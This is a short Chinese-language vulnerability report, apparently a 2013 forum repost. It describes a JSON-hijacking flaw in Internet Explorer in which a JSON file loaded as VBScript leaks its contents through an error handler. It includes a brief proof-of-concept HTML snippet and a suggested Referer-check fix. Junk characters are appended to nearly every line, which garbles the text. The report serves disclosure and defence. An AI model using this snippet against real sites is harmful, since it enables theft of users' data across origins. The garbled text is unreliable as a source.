简要描述:
$ K2 y& ^8 C' I; f2 I0 p+ I7 c# _7 f+ R$ \' e, \
由于某些资源容器对数据处理不当导致json劫持漏洞.: q) @) N7 o" @ }! [1 x0 v
详细说明:; p) ]: k1 v: D" M B" W
由于ie支持vbscript,所以script元素可以指定成vbscript语言:6 O1 u6 I1 n9 c4 |
<script language=vbscript></script>' F( x7 V ^* z# ~4 Y X; W+ W/ o
& a& F0 u) N/ u) H* ^
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.4 ^& ^% _' c0 {2 l
漏洞证明:# b! M( _* m0 g/ B+ U8 \% a
<script>5 Y9 B7 a6 |( d8 Q
window.onerror=function(_){* F& z7 t0 `# r" l! x& e% i
alert(_)% r% s# @: {4 n" r) `
}' G' x ?: K. u" ?
</script>' ?. D3 w& K5 G& x
<script language=vbscript src=1.json></script>
1 A# }0 A+ S9 Z' \1 N/ @
0 E. C% r) Q, y1 @& N; y# b# H* R / x2 S1 K- z5 q7 j! b5 q, L' o n E
1.json:! r" L1 Y" X. [/ r) h; a
[{"name":"sogili","age":19}]; r/ `" ?0 T$ a* B9 u. C( l
修复方案:6 S% V9 y/ P' C" @! m) j
网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对